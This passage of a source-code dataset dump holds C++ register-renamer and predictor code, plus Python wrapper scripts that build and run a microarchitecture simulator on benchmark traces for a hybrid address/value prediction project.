(uint64_t)(gbmBinary.to_ulong());\r\n\t\tbCheckPoint[branchId].freeListHead = flHead;\r\n\t\tbCheckPoint[branchId].GBM = GBM;\r\n for(int i =0; i<= logRegSize-1; i++)\r\n\t\tbCheckPoint[branchId].shadowMapTable[i] = rmt[i];\r\n\t\treturn branchId;\r\n\t}\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Dispatch Stage. //\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// The Dispatch Stage must stall if there are not enough free\r\n\t// entries in the Active List for all instructions in the current\r\n\t// dispatch bundle.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. bundle_inst: number of instructions in current dispatch bundlethere\r\n\t//\r\n\t// Return value:\r\n\t// Return \"true\" (stall) if the Active List does not have enough\r\n\t// space for all instructions in the dispatch bundle.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// To find the number of free Active List registers\r\n\r\n\r\n\r\n\tbool renamer::stall_dispatch(uint64_t bundle_inst) {\r\n uint64_t freeRegCount = 0;\r\n\t\t for (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\t if (actList[i].valid == 0) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeRegCount < bundle_inst) {\r\n\t\t\t//printf(\"Dispatch Stalled \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function dispatches a single instruction into the Active\r\n\t// List.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. dest_valid: If 'true', the instr. has a destination register,\r\n\t// otherwise it does not. If it does not, then the log_reg and\r\n\t// phys_reg inputs should be ignored.\r\n\t// 2. log_reg: Logical register number of the instruction's\r\n\t// destination.\r\n\t// 3. phys_reg: Physical register number of the instruction's\r\n\t// destination.\r\n\t// 4. load: If 'true', the instr. is a load, otherwise it isn't.\r\n\t// 5. store: If 'true', the instr. is a store, otherwise it isn't.\r\n\t// 6. branch: If 'true', the instr. is a branch, otherwise it isn't.\r\n\t// 7. amo: If 'true', this is an atomic memory operation.\r\n\t// 8. csr: If 'true', this is a system instruction.\r\n\t// 9. PC: Program counter of the instruction.\r\n\t//\r\n\t// Return value:\r\n\t// Return the instruction's index in the Active List.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// Before dispatching the instruction into the Active List, assert\r\n\t// that the Active List isn't full: it is the user's responsibility\r\n\t// to avoid a structural hazard by calling stall_dispatch()\r\n\t// in advance.\r\n\t/////////////////////////////////////////////////////////////////////\r\n uint64_t renamer::dispatch_inst(bool dest_valid,\r\n\t\tuint64_t log_reg,\r\n\t\tuint64_t phys_reg,\r\n\t\tbool load,\r\n\t\tbool store,\r\n\t\tbool branch,\r\n\t\tbool amo,\r\n\t\tbool csr,\r\n\t\tuint64_t PC) {\r\n\t\tuint64_t activeIndex;\r\n\t\tassert(!stall_dispatch(1));\r\n\t\tif (dest_valid) {\r\n\t\t\tactList[alTail].logicalRegister = log_reg;\r\n\t\t\tactList[alTail].physicalRegister = phys_reg;\r\n //phyRegisterReady[phys_reg] = 0;\r\n }\r\n else{\r\n }\r\n actList[alTail].destinationFlag = dest_valid;\r\n\t\tactList[alTail].loadFlag = load;\r\n\t\tactList[alTail].storeFlag = store;\r\n\t\tactList[alTail].branchFlag = branch;\r\n\t\tactList[alTail].amoFlag = amo;\r\n\t\tactList[alTail].csrFlag = csr;\r\n\t\tactList[alTail].pc = PC;\r\n\t\tactList[alTail].valid = 1;\r\n actList[alTail].ready = 0;\r\n actList[alTail].exception = 0;\r\n actList[alTail].loadViolationBit = 0;\r\n actList[alTail].branchMispredictionBit = 0;\r\n actList[alTail].valueMispredictionBit = 0;\r\n \r\n\t\tactiveIndex = alTail;\r\n\t\tif (alTail == phyRegSize - logRegSize - 1) {\r\n\t\t\talTail = 0;\r\n\t\t}\r\n\t\telse {\r\n\t\t\talTail++;\r\n\t\t}\r\n\t\treturn activeIndex;\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Schedule Stage. //\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Test the ready bit of the indicated physical register.\r\n\t// Returns 'true' if ready.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::is_ready(uint64_t phys_reg) {\r\n\t\tif (phyRegisterReady[phys_reg] == 1) {\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Clear the ready bit of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::clear_ready(uint64_t phys_reg) {\r\n\t\tphyRegisterReady[phys_reg] = 0;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Set the ready bit of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_ready(uint64_t phys_reg){\r\n\t\tphyRegisterReady[phys_reg] = 1;\r\n\t\t//if(phys_reg == 197)\r\n\t\t\t//printf(\"Destination Ready bit set for phy mapping 197 of inst 154 \\n\");\r\n\t}\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Reg. Read Stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Return the contents (value) of the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::read(uint64_t phys_reg) {\r\n\t\treturn phyList[phys_reg];\r\n\t}\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Writeback Stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Write a value into the indicated physical register.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::write(uint64_t phys_reg, uint64_t value) {\r\n\t\tif (phys_reg == 266) {\r\n\t\t\t//printf(\"Destination Value : %d \\n\", value);\r\n\t\t}\r\n\t\tphyList[phys_reg] = value;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Set the completed bit of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_complete(uint64_t AL_index) {\r\n\t\tactList[AL_index].ready = 1;\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is for handling branch resolution.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. AL_index: Index of the branch in the Active List.\r\n\t// 2. branch_ID: This uniquely identifies the branch and the\r\n\t// checkpoint in question. It was originally provided\r\n\t// by the checkpoint function.\r\n\t// 3. correct: 'true' indicates the branch was correctly\r\n\t// predicted, 'false' indicates it was mispredicted\r\n\t// and recovery is required.\r\n\t//\r\n\t// Outputs: none.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// While recovery is not needed in the case of a correct branch,\r\n\t// some actions are still required with respect to the GBM and\r\n\t// all checkpointed GBMs:\r\n\t// * Remember to clear the branch's bit in the GBM.\r\n\t// * Remember to clear the branch's bit in all checkpointed GBMs.\r\n\t//\r\n\t// In the case of a misprediction:\r\n\t// * Restore the GBM from the checkpoint. Also make sure the\r\n\t// mispredicted branch's bit is cleared in the restored GBM,\r\n\t// since it is now resolved and its bit and checkpoint are freed.\r\n\t// * You don't have to worry about explicitly freeing the GBM bits\r\n\t// and checkpoints of branches that are after the mispredicted\r\n\t// branch in program order. The mere act of restoring the GBM\r\n\t// from the checkpoint achieves this feat.\r\n\t// * Restore other state using the branch's checkpoint.\r\n\t// In addition to the obvious state ... *if* you maintain a\r\n\t// freelist length variable (you may or may not), you must\r\n\t// recompute the freelist length. It depends on your\r\n\t// implementation how to recompute the length.\r\n\t// (Note: you cannot checkpoint the length like you did with\r\n\t// the head, because the tail can change in the meantime;\r\n\t// you must recompute the length in this function.)\r\n\t// * Do NOT set the branch misprediction bit in the active list.\r\n\t// (Doing so would cause a second, full squash when the branch\r\n\t// reaches the head of the Active List. We don’t want or need\r\n\t// that because we immediately recover within this function.)\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::resolve(uint64_t AL_index,\r\n\t\tuint64_t branch_ID,\r\n\t\tbool correct) {\r\n\t\tif (correct) {\r\n\t\t\t\r\n\t\t\t//to clear the branch's bit in the GBM.\r\n\t\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\t\tgbmBinary[branch_ID] = 0;\r\n\t\t\tGBM = (uint64_t)(gbmBinary.to_ulong());\r\n\t\t\t\r\n\r\n\t\t\t//to clear the branch's bit in all checkpointed GBMs.\r\n\t\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\t\tstd::bitset\t<64> gbmCheckpointBinary(bCheckPoint[i].GBM);\r\n\t\t\t\tgbmCheckpointBinary[branch_ID] = 0;\r\n\t\t\t\tbCheckPoint[i].GBM = (uint64_t)(gbmCheckpointBinary.to_ulong());\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t\telse {\r\n //assert(0);\r\n\t\t\tGBM = bCheckPoint[branch_ID].GBM;\r\n\t\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\t\tgbmBinary[branch_ID] = 0;\r\n\t\t\tGBM = (uint64_t)(gbmBinary.to_ulong());\r\n\t\t\t\r\n\t\t\t// restoring rmt\r\n for(int i=0; i<=logRegSize-1; i++)\r\n\t\t\trmt[i] = bCheckPoint[branch_ID].shadowMapTable[i];\r\n\r\n\t\r\n\r\n if(flHead > flTail){\r\n for(int i = bCheckPoint[branch_ID].freeListHead ;i<flHead; i++)\r\n fl[i].valid = 1;\r\n }\r\n else{\r\n\t if(bCheckPoint[branch_ID].freeListHead > flHead){\r\n for(int i =bCheckPoint[branch_ID].freeListHead; i<=(phyRegSize - logRegSize - 1); i++)\r\n fl[i].valid = 1;\r\n \r\n for(int i =0; i<flHead; i++)\r\n fl[i].valid = 1;\r\n }\r\n \telse{\r\n\t\t for(int i = bCheckPoint[branch_ID].freeListHead ;i<flHead; i++)\r\n \tfl[i].valid = 1;\r\n \t\t}\r\n\t } \r\n flHead = bCheckPoint[branch_ID].freeListHead;\r\n \r\n\r\n\r\n\t\t\t\r\n\r\n\t\t\t// restoring tail pointer of active list\r\n\r\n\t\t\tif (alTail > alHead) {\r\n\t\t\t\tfor (int i = AL_index + 1; i < alTail; i++) {\r\n\t\t\t\t\tactList[i].valid = 0;\r\n\t\t\t\t}\r\n\t\t\t\talTail = AL_index + 1;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tif(AL_index < alTail){\r\n\t\t\t\t\tfor (int i = AL_index + 1; i < alTail; i++) {\r\n\t\t\t\t\t\tactList[i].valid = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t\talTail = AL_index + 1;\r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n if(AL_index == phyRegSize-logRegSize-1){\r\n\t\t\t\t\t for (int i = 0; i < alTail; i++) {\r\n\t\t\t\t\t\t actList[i].valid = 0;\r\n\t\t\t\t\t }\r\n\t\t\t\t\t alTail = 0;\r\n }\r\n else{\r\n for(int i= AL_index+1; i<=phyRegSize-logRegSize-1; i++){\r\n actList[i].valid = 0;\r\n }\r\n for(int i=0; i<alTail; i++){\r\n actList[i].valid = 0;\r\n }\r\n alTail = AL_index + 1;\r\n }\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\r\n\t\t}\r\n\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions related to Retire Stage. //\r\n\t//////////////////////////////////////////\r\n\r\n\t///////////////////////////////////////////////////////////////////\r\n\t// This function allows the caller to examine the instruction at the head\r\n\t// of the Active List.\r\n\t//\r\n\t// Input arguments: none.\r\n\t//\r\n\t// Return value:\r\n\t// * Return \"true\" if the Active List is NOT empty, i.e., there\r\n\t// is an instruction at the head of the Active List.\r\n\t// * Return \"false\" if the Active List is empty, i.e., there is\r\n\t// no instruction at the head of the Active List.\r\n\t//\r\n\t// Output arguments:\r\n\t// Simply return the following contents of the head entry of\r\n\t// the Active List. These are don't-cares if the Active List\r\n\t// is empty (you may either return the contents of the head\r\n\t// entry anyway, or not set these at all).\r\n\t// * completed bit\r\n\t// * exception bit\r\n\t// * load violation bit\r\n\t// * branch misprediction bit\r\n\t// * value misprediction bit\r\n\t// * load flag (indicates whether or not the instr. is a load)\r\n\t// * store flag (indicates whether or not the instr. is a store)\r\n\t// * branch flag (indicates whether or not the instr. is a branch)\r\n\t// * amo flag (whether or not instr. is an atomic memory operation)\r\n\t// * csr flag (whether or not instr. is a system instruction)\r\n\t// * program counter of the instruction\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::precommit(bool &completed,\r\n\t\tbool &exception, bool &load_viol, bool &br_misp, bool &val_misp,\r\n\t\tbool &load, bool &store, bool &branch, bool &amo, bool &csr,\r\n\t\tuint64_t &PC) {\r\n \r\n if (actList[alHead].valid == 1) {\r\n\t\t\tcompleted = actList[alHead].ready;\r\n\t\t\texception = actList[alHead].exception;\r\n\t\t\tload_viol = actList[alHead].loadViolationBit;\r\n\t\t br_misp = actList[alHead].branchMispredictionBit;\r\n\t\t\tval_misp = actList[alHead].valueMispredictionBit;\r\n\t\t\tload = actList[alHead].loadFlag;\r\n\t\t\tstore = actList[alHead].storeFlag;\r\n\t\t\tbranch = actList[alHead].branchFlag;\r\n\t\t\tamo = actList[alHead].amoFlag;\r\n\t\t\tcsr = actList[alHead].csrFlag;\r\n\t\t\tPC = actList[alHead].pc;\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n \r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function commits the instruction at the head of the Active List.\r\n\t//\r\n\t// Tip (optional but helps catch bugs):\r\n\t// Before committing the head instruction, assert that it is valid to\r\n\t// do so (use assert() from standard library). Specifically, assert\r\n\t// that all of the following are true:\r\n\t// - there is a head instruction (the active list isn't empty)\r\n\t// - the head instruction is completed\r\n\t// - the head instruction is not marked as an exception\r\n\t// - the head instruction is not marked as a load violation\r\n\t// It is the caller's (pipeline's) duty to ensure that it is valid\r\n\t// to commit the head instruction BEFORE calling this function\r\n\t// (by examining the flags returned by \"precommit()\" above).\r\n\t// This is why you should assert() that it is valid to commit the\r\n\t// head instruction and otherwise cause the simulator to exit.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::commit() {\r\n\t\tassert((actList[alHead].valid == 1));\r\n assert((actList[alHead].ready == 1));\r\n assert((actList[alHead].exception == 0) );\r\n assert((actList[alHead].loadViolationBit == 0));\r\n if(actList[alHead].destinationFlag == true){\r\n \t\t\r\n // Copying existing phy Mapping from AMT to Free List\r\n \t\tfl[flTail].physicalReg = amt[actList[alHead].logicalRegister];\r\n \t\tfl[flTail].valid = 1;\t\r\n phyRegisterReady[amt[actList[alHead].logicalRegister]] = 0;\r\n \t\t\r\n if (flTail == (phyRegSize - logRegSize - 1)) {\r\n \t\t\tflTail = 0;\r\n \t\t}\r\n \t\telse {\r\n \t\t\tflTail++;\r\n \t\t}\r\n \r\n \r\n \r\n \t\t// Copying new committed mapping from active list head to amt\r\n \t\tamt[actList[alHead].logicalRegister] = actList[alHead].physicalRegister;\r\n \r\n }\r\n else{\r\n }\r\n \tactList[alHead].valid = 0;\r\n\t\tif (alHead == (phyRegSize - logRegSize -1)) {\r\n\t\t\talHead = 0;\r\n\t\t}\r\n\t\telse {\r\n\t\t\talHead++;\r\n\t\t}\r\n \r\n\t}\r\n\r\n\t//////////////////////////////////////////////////////////////////////\r\n\t// Squash the renamer class.\r\n\t//\r\n\t// Squash all instructions in the Active List and think about which\r\n\t// sructures in your renamer class need to be restored, and how.\r\n\t//\r\n\t// After this function is called, the renamer should be rolled-back\r\n\t// to the committed state of the machine and all renamer state\r\n\t// should be consistent with an empty pipeline.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::squash() {\r\n //assert(0);\r\n\t\t// Squashing All Instructions in Active List\r\n\t\talTail = alHead;\r\n\t\tfor (int i = 0; i <= phyRegSize - logRegSize - 1; i++) {\r\n\t\t\tactList[i].valid = 0;\r\n\t\t}\r\n\r\n\t\t// Restoring rmt from amt\r\n for(int i=0; i<=(logRegSize-1); i++)\r\n\t\trmt[i] = amt[i];\r\n\r\n\t\t// Restoring branch checkpoints\r\n\t\tGBM = 0;\r\n\r\n\t\t// Restoring Free List\r\n\t\tflHead = flTail;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tfl[i].valid = 1;\r\n\t\t}\r\n\r\n\t\t// Restoring physical Ready Bits\r\n\t\tfor (int i = 0; i <= phyRegSize - logRegSize - 1; i++) {\r\n\t\t\t//phyRegisterReady[fl[i].physicalReg] = 0;\r\n\t\t\tphyRegisterReady[i] = 0;\r\n\r\n\r\n\t\t}\r\n\r\n\t\tfor (int i = 0; i <= (logRegSize - 1); i++)\r\n\t\tphyRegisterReady[amt[i]] = 1;\r\n\r\n\t}\r\n\r\n\t//////////////////////////////////////////\r\n\t// Functions not tied to specific stage.//\r\n\t//////////////////////////////////////////\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Functions for individually setting the exception bit,\r\n\t// load violation bit, branch misprediction bit, and\r\n\t// value misprediction bit, of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tvoid renamer::set_exception(uint64_t AL_index) {\r\n\t\tactList[AL_index].exception = 1;\r\n\t}\r\n\tvoid renamer::set_load_violation(uint64_t AL_index) {\r\n\t\tactList[AL_index].loadViolationBit = 1;\r\n\t}\r\n\tvoid renamer::set_branch_misprediction(uint64_t AL_index) {\r\n\t\tactList[AL_index].branchMispredictionBit = 1;\r\n\t}\r\n\tvoid renamer::set_value_misprediction(uint64_t AL_index) {\r\n\t\tactList[AL_index].valueMispredictionBit = 1;\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// Query the exception bit of the indicated entry in the Active List.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tbool renamer::get_exception(uint64_t AL_index) {\r\n\t\treturn actList[AL_index].exception;\r\n\t}\r\n\r\n\r\n" }, { "alpha_fraction": 0.677994430065155, "alphanum_fraction": 0.6857938766479492, "avg_line_length": 22.256755828857422, "blob_id": "120d51eb14773c6b281e2e98ad87d5d5b9991f27", "content_id": "e9e2d5854301e3572d91520c084b6c2c0c6af704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1795, "license_type": "no_license", "max_line_length": 78, "num_lines": 74, "path": "/721sim-partial/uarchsim/mpt.h", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include \"pipeline.h\"\r\n\r\ntypedef struct {\r\n\r\n\tbool valid;\r\n\tunsigned int effective_address;\r\n\tint stride;\r\n\tint shb;\r\n\tunion64_t value;\r\n\tbool valid_value;\r\n\tunsigned int next_predicted_address;\r\n\tint pred_count; // Count for multiple outstanding prediction\r\n \tint dispatch_conf; // #cycles for getting ready and issued\r\n\r\n} mpt_table;\r\n\r\n//Forward declaring classes\r\nclass pipeline_t;\r\nclass payload;\r\nclass stats_t;\r\n\r\nclass mpt {\r\nprivate:\r\n\tpipeline_t* proc;\r\n\tmpt_table* mp_table;\r\n\tint size; // always powers of 2\r\n\r\n\r\npublic:\r\n\r\n int confident_and_correct= 0;\r\n int confident_and_incorrect= 0;\r\n int not_confident_and_correct= 0;\r\n int not_confident_and_incorrect= 0;\r\n \r\n\tint delay_one_to_five = 0;\r\n\tint delay_five_to_ten = 0;\r\n\tint delay_ten_to_fifty = 0;\r\n\tint delay_fifty_to_seventy_five = 0;\r\n\tint delay_seventy_five_to_hundred = 0;\r\n\tint delay_more_than_hundred = 0;\r\n\r\n\t// Constructor\r\n\tmpt(unsigned int size);\r\n\r\n\t// Read the mpt for matching Load/Store entry in the Fetch stage\r\n\tbool read_entry(unsigned int pc);\r\n\r\n\t// Create a new entry in the mpt after AGEN/RETIRE stage\r\n\tvoid create_entry(reg_t addr, unsigned int pc);\r\n\r\n\t// Is Address Predictable\r\n\tbool is_addr_predictable(unsigned int pc);\r\n\r\n\t// Predict Address\r\n\tunsigned int predict_address(unsigned int pc);\r\n\r\n\t// Predict Next Address\r\n\tunsigned int predict_next_addr (unsigned int pc);\r\n\r\n\t// Update an existing entry in MPT after RETIRE\r\n\tvoid update_entry(reg_t current_addr, unsigned int pc, int inst_issue_delay);\r\n\r\n\t// Set confidence to 0 on misprediction\r\n\tvoid set_confidence_low(unsigned int pc);\r\n\r\n\t// Resect all prediction Counts to zer on squash\r\n\tvoid squash_pred_count();\r\n\r\n\tvoid dec_pred_count(unsigned int pc);\r\n\r\n\tvoid inc_pred_count(unsigned int pc);\r\n\r\n};\r\n" }, { "alpha_fraction": 0.4333810806274414, "alphanum_fraction": 0.5938395261764526, "avg_line_length": 34.79487228393555, "blob_id": "077c8a37411e1a073381d23bf9b6984102b46335", "content_id": "c9def8783111837f562bcfd8047746739643bb61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1396, "license_type": "no_license", "max_line_length": 167, "num_lines": 39, "path": "/721sim-partial/uarchsim/wrapper_1.py", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nos.system(\"make clean\")\nos.system(\"make\")\n\n\nlist = []\n'''list.append('456.hmmer_test.74.0.22.gz') \nlist.append('473.astar_test.76.0.22.gz') \nlist.append('401.bzip2_dryer_test.53.0.35.gz')'''\nlist.append('410.bwaves_test.370.0.45.gz') \nlist.append('473.astar_ref.871.0.43.gz') \nlist.append('473.astar_rivers_ref.2890.0.28.gz') \n'''list.append('429.mcf_test.7.0.38.gz') \nlist.append('473.astar_rivers_ref.322.0.20.gz') \nlist.append('433.milc_test.74.0.30.gz') ''' \n'''list.append('473.astar_rivers_ref.5883.0.20.gz') \nlist.append('437.leslie3d_test.152.0.25.gz') \nlist.append('444.namd_test.84.0.21.gz') \nlist.append('483.xalancbmk_test.2.0.33.gz') \nlist.append('445.gobmk_ref.2465.0.18.gz') \nlist.append('453.povray_ref.2301.0.24.gz') \nlist.append('458.sjeng_test.24.0.24.gz') \nlist.append('462.libquantum_ref.13679.0.28.gz') \nlist.append('464.h264ref_ref.1989.0.46.gz') \nlist.append('465.tonto_test.22.0.29.gz') \nlist.append('471.omnetpp_test.6.0.58.gz')'''\n\n#filename = \"output.txt\"\n#open(filename, 'w').close()\n\n\nfor i in list:\n\tcmd = \"./721sim --disambig=0,1 --perf=0,0,0,0 --fq=128 --cp=64 --al=512 --lsq=256 --iq=128 --iqnp=4 --fw=16 --dw=16 --iw=16 --rw=16 -m2048 -e100000000 -c\" + i + \" pk\"\n\n\tprint(cmd)\n\n\tos.system(cmd)\n" }, { "alpha_fraction": 0.42937853932380676, "alphanum_fraction": 0.5790960192680359, "avg_line_length": 26.230770111083984, "blob_id": "dcc91141efe0bad5d5b9cbfdb996a23b6d02dcf0", "content_id": "bfb3e8ea752170a73e25669dcdd1cb91db72fe1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 708, "license_type": "no_license", "max_line_length": 200, "num_lines": 26, "path": "/721sim-partial/uarchsim/wrapper4.py", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nos.system(\"make clean\")\nos.system(\"make\")\n\n\nlist = []\n\nlist.append('453.povray_ref.2301.0.24.gz') \nlist.append('458.sjeng_test.24.0.24.gz') \nlist.append('462.libquantum_ref.13679.0.28.gz') \nlist.append('464.h264ref_ref.1989.0.46.gz') \nlist.append('465.tonto_test.22.0.29.gz') \nlist.append('471.omnetpp_test.6.0.58.gz')\n\n#filename = \"output.txt\"\n#open(filename, 'w').close()\n\n\nfor i in list:\n\tcmd = \"./721sim --disambig=0,1 --perf=0,0,0,0,0 --vflags=0,1,0,1 --vp=2 --psize=1024 --fq=64 --cp=32 --al=256 --lsq=128 --iq=64 --iqnp=4 --fw=4 --dw=4 --iw=8 --rw=4 -m2048 -e100000000 -c\" + i + \" pk\"\n\n\tprint(cmd)\n\n\tos.system(cmd)\n" }, { "alpha_fraction": 0.6147642731666565, "alphanum_fraction": 0.7053349614143372, "avg_line_length": 28.309091567993164, "blob_id": "30f9bcf8225733c9734b4220642a1a62e8a0dfc3", "content_id": "907d4aa8affdbd1a97450c4c2a046c7caadaa5a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1612, "license_type": "no_license", "max_line_length": 109, "num_lines": 55, "path": "/721sim-partial/uarchsim/predictor.h", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <inttypes.h>\n\nclass predictor\n{\nprivate:\n\tstruct pred\n\t{\n\t\tuint64_t last_val, last_val2, last_val3,last_val4, del, conf, iter_count;\n\t};\n\tstruct hyb_pred\n\t{\n\t\tuint64_t last_val, del, conf;\n\t};\n\tstruct VPT\t{\n\t\tuint64_t value, conf;\n\t};\n\n\tuint64_t *update_queue;\n\tuint64_t *chooser;\n\tbool choose;\n\tVPT *vpt;\n\thyb_pred *hystride;\n\tpred *predict;\npublic:\n\tint correct_predicted_count = 0;\n\tint misp_count = 0;\n\tint not_predicted_but_correct = 0;\n\tint not_predicted_not_correct = 0;\n\tint predicted =0;\n\tint counter = 0;\n\tint order = 0;\n\tint al_size;\n\tbool hybrid;\n\tuint64_t HASH;\n\tuint64_t uq_tail;\n\tuint64_t uq_head;\n\tpredictor(uint64_t AL_size, uint64_t type, uint64_t ORD);\n\tuint64_t stride(uint64_t tag);\n\tuint64_t last_value(uint64_t tag);\n\tuint64_t get_val(uint64_t type, uint64_t PC);\n\tuint64_t hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4);\n\tvoid enqueue (uint64_t tag);\n\tuint64_t get_context_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tuint64_t get_hybrid_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tvoid update_predict(uint64_t value, uint64_t PC, uint64_t index);\n\tvoid dec_iter(uint64_t PC);\n\tvoid inc_iter(uint64_t PC);\n\tvoid clear_predictor();\n\tvoid checkpoint_context(uint64_t tail);\n\tbool get_conf(uint64_t PC);\n\tbool get_context_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tbool get_hybrid_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\t~predictor();\n};\n" } ]
7
Cynthia59/MylubanWeb
https://github.com/Cynthia59/MylubanWeb
37d4ada5ad56fa318d497bb788cb5501dcd523d8
ee74c46fca9f49c6efdb8cfbf52c11a1e6d5f086
4b92dbb6daaf575e9eaa4db45cb044a3f24bc644
refs/heads/master
2020-03-23T04:12:55.177144
2018-07-16T01:13:46
2018-07-16T01:13:46
141,070,503
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6596342921257019, "alphanum_fraction": 0.6765119433403015, "avg_line_length": 26.30769157409668, "blob_id": "9cf00800ecf3ea52e2134547048c0320383f6ee9", "content_id": "0086605d6cdc5a254558b7c5f340670ec6c82088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 757, "license_type": "no_license", "max_line_length": 87, "num_lines": 26, "path": "/webtest/run_test.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = run_test\n@function = \n@author = Cindy\n@create_time = 2018/6/12 9:19\n@python_version = 3.x\n\"\"\"\n\nimport unittest, os, time, sys\nfrom HTMLTestRunner import HTMLTestRunner\nfrom testcase.models.function import copy_latest_report\n\n# 指定测试用例为当前文件夹下的testcase目录\ntest_dir = './testcase'\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='*_test.py')\n\nif __name__ == '__main__':\n now = time.strftime(\"%Y-%m-%d %H-%M-%S\")\n filename = './report/' + now + 'result.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner(stream=fp, title='myluban web test', description='用例执行情况:')\n runner.run(discover)\n fp.close()\n copy_latest_report()\n\n" }, { "alpha_fraction": 0.5771812200546265, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 15.55555534362793, "blob_id": "0c7ec3827c3b7365efed8c0c560cfa2c28497932", "content_id": "fa1b48e798b89307d4a067fe5ab7cde654efc3ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/webtest/testcase/page_obj/desktopPage.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = desktopPage\n@function = \n@author = Cindy\n@create_time = 2018/6/13 16:22\n@python_version = 3.x\n\"\"\"\n" }, { "alpha_fraction": 0.6246649026870728, "alphanum_fraction": 0.6278820633888245, "avg_line_length": 34.20754623413086, "blob_id": "a041addd9d61140a4d25f7491ff2dca4eef683f2", "content_id": "91c804f68e28f199450b31f62666c8759c902c42", 